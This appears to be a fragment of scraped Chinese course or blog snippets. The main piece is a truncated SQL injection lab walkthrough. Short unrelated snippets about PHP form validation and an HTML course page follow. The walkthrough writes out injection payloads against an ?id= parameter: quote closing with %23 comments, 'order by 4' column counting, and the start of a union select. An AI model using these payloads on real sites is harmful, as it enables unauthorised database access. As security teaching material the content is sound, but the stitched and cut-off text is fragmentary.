sql注入显错注入
6.6.1安提示穿参一个值 ?id=1在输入 and 1=1 与 and1=2 均为报错 发现有穿参数为字符串类型并有 limit 0.1 通过 ?id=1' and 1=2 %23来闭合和注释通过order by 排序判断字段 ?id=1' order by 4 %23通过联合查询测试回显点 ?id=1' and 1=2 union se
后端PHP表单验证
前端<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>掌控安全第三堂课</title></head><body&g
1